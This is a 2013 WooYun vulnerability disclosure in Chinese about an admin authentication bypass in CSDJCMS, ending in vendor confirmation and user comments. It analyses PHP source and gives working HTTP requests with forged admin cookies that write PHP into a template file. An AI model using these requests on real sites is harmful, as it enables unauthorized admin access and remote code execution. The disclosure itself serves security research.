当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(7) 关注此漏洞

缺陷编号: WooYun-2013-22422

漏洞标题: CSDJCMS拿shell漏洞与PHP源码分析过程

相关厂商: chshcms.com

漏洞作者: 枫叶

提交时间: 2013-04-24 22:21

公开时间: 2013-06-08 22:21

漏洞类型: 设计缺陷/逻辑错误

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 第三方不可信程序 Cookie欺骗 cookie安全 webshell CSDJCMS

0人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-24: 细节已通知厂商并且等待厂商处理中
2013-04-24: 厂商已经确认,细节仅向厂商公开
2013-05-04: 细节向核心白帽子及相关领域专家公开
2013-05-14: 细节向普通白帽子公开
2013-05-24: 细节向实习白帽子公开
2013-06-08: 细节向公众公开

简要描述:

CSDJCMS漏洞后台拿shell

详细说明:

code 区域
include_once("include/install.php");


if(S_IsInstall==0){





        header("Location:install/install.php");





        }





include_once("include/label.php");





if(S_Webmode==1 or !file_exists("index.html")){





          //缓存区





          $cache_id ='index_';





          if(!($cache_opt->start($cache_id))){





                   echo GetTemp("index.html",0);        





                  $cache_opt->end();





          }





        }





else{





        header("Location:index.html");





        }





//看他配置吧


function SafeRequest($key,$mode,$isfilter=''){





    set_magic_quotes_runtime(0);





    $magic= get_magic_quotes_gpc();





    switch ($mode){





         case 'post':





             $value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';





         break;





         case 'get':





             $value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';





         break;





         default:





             $value=isset($_POST[$key]) ?$magic?trim($_POST[$key]):addslashes(trim($_POST[$key])) : '';





             if($value==""){





                  $value=isset($_GET[$key]) ?$magic?trim($_GET[$key]):addslashes(trim($_GET[$key])) : '';





             }





         break;





    }





       if($isfilter!=''){





          $value=lib_replace_end_tag($value);





       }





  return $value;





}


//变量的提交进行了addslashes安全过滤





//研究了半天的源码发现后台的严重出现了大的安全问题


include "../include/conn.php";





include "../include/function.php";





include "admin_version.php";





include "admin_loginstate.php"; //问题出在这个文件当中





//跟入





if(empty($_COOKIE['S_AdminID'])){  //首先看是否存在s_adminid这个cooke





                echo "<script>window.location='admin_login.php'</script>";





                }





        elseif($_COOKIE['S_Login']!=md5($_COOKIE['S_AdminID'].$_COOKIE['S_AdminUserName'].$_COOKIE['S_AdminPassWord'].$_COOKIE['S_Permission'])){   





//这里就是问题的关键之处了


如果s_login 的值等于 四个cookie 相加的md5加密,即可直接验证通过


                echo "<script>window.parent.location='admin_login.php'</script>";





                }





//后台权限判断





function SystemPer($Column){





   if(empty($_COOKIE['S_Permission'])){





        die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");





   }else{





        $SystemPermission=explode(",",$_COOKIE['S_Permission']); //权限的判断,用“,”来分割成数组





        $StateOK=0;





        $ArrSystemPermission=count($SystemPermission);





           for($k=0;$k<$ArrSystemPermission;$k++){ 





              if($SystemPermission[$k]==$Column){   //判断





                     $StateOK=1;   





              }





           }





       if($StateOK==0){





            die("<script>jAlert('对不起,您无权限操作此功能!','操作错误',function(R){window.location='javascript:history.go(-1)';})</script>");





       } 





   }





}





//构造淫荡的cookies


//S_Permission


//1,2,3,4,5,6,7,8,9,10,11,12,13,14,15


//S_Login


//md5(AdminID+AdminUserName+AdminPassWord+S_Permission)


//S_AdminUserName


//1


//S_AdminPassWord


//1


//S_AdminID


//1





后台成功绕过。





//看看3.0版本,也是一样


<?php


# Name: PHP版程氏音乐CMS管理系统 v3.0


# Author: 程氏<[email]web@chshcms.com[/email]> [QQ:848769359]


# Homepage:[url]http://www.chshcms.cn/[/url]


$CS_Path=$_SERVER['PHP_SELF'];


$CS_Pathall=explode("/",$CS_Path);


$CS_Admin=$CS_Pathall[1]."/";


        if(empty($_COOKIE['CS_AdminID'])){


                echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php';</script>";


                }


        elseif($_COOKIE['CS_Login']!=md5($_COOKIE['CS_AdminID'].$_COOKIE['CS_AdminUserName'].$_COOKIE['CS_AdminPassWord'].$_COOKIE['CS_Quanx'])){


                echo "<script>window.parent.location='".CS_WebPath.$CS_Admin."login.php'</script>";


                }


//后台权限判断


function SystemPer($Column){


   if(empty($_COOKIE['CS_Quanx'])){


        die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");


        exit();


   }else{


        $SystemPermission=explode(",",$_COOKIE['CS_Quanx']);


        $StateOK=0;


        $ArrSystemPermission=count($SystemPermission);


           for($k=0;$k<$ArrSystemPermission;$k++){


              if($SystemPermission[$k]==$Column){


                     $StateOK=1;   


              }


           }


       if($StateOK==0){


            die("<script>alert('对不起,您无权限操作此功能!');window.location='javascript:history.go(-1);'</script>");


            exit();


       } 


   }

漏洞证明:

exp V2.5

Host: www.xxx.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://www.xxx.com/admin/admin_t ... ;file=artindex.html

Cookie: S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 169



FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5



--------------------------------------------



exp V3.0:

Host: www.xxx.com

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: http://www.xxx.com/admin/skins/s ... ;name=cs-bottom.php

Cookie: CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 57



name=cs-bottom.php&content=%3C%3Fphp+phpinfo%28%29+%3F%3E

修复方案:

版权声明:转载请注明来源 枫叶@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-04-24 22:24

厂商回复:

谢谢提醒,已经修复!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
50%
0%
0%
0%
50%

评价

  1. 2013-05-26 20:19 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了,刷分还是不刷?)
    0

    这么好的分析才给5分

    1# 回复此人
  2. 2013-07-05 14:37 | knife ( 普通白帽子 | Rank:155 漏洞数:24 | 抬枪上御女,提臀迎众基。)
    0

    版权呢?老子找的漏洞。你要脸不?

    2# 回复此人
  3. 2014-09-30 16:24 | D&G ( 普通白帽子 | Rank:570 漏洞数:116 | going)
    0

    这个分析确实不错。

    3# 回复此人

登录后才能发表评论,请先 登录